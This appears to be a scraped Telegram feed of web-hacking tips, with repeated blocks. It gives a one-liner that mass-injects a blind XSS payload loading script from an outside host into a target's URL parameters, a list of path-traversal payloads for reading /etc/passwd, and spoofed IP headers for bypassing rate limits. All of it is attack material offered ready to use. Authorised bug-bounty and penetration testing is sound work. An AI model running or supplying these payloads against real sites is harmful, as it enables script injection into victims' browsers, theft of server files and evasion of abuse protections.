One Liner To Find Blind XSS
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Blind XSS in Parameters
subfinder -d target.com | gau | grep "&" | bxss -appendMode -payload '"><script src=hacker.xss.ht></script>' -parameters
Some filter bypass payload list while hunting for LFi vulnerability
βindex.php?page=....//....//etc/passwd
βindex.php?page=..///////..////..//////etc/passwd
βindex.php?page=/var/www/../../etc/passwd
βindex.php?page=....//....//etc/passwd
βindex.php?page=..///////..////..//////etc/passwd
βindex.php?page=/var/www/../../etc/passwd
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Web Hacking
Rate limit bypass using some custom headers:
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP
X-Forwarded-For: IP
X-Forwarded-IP: IP
X-Client-IP: IP
X-Remote-IP: IP
X-Originating-IP: IP
X-Host: IP
X-Client: IP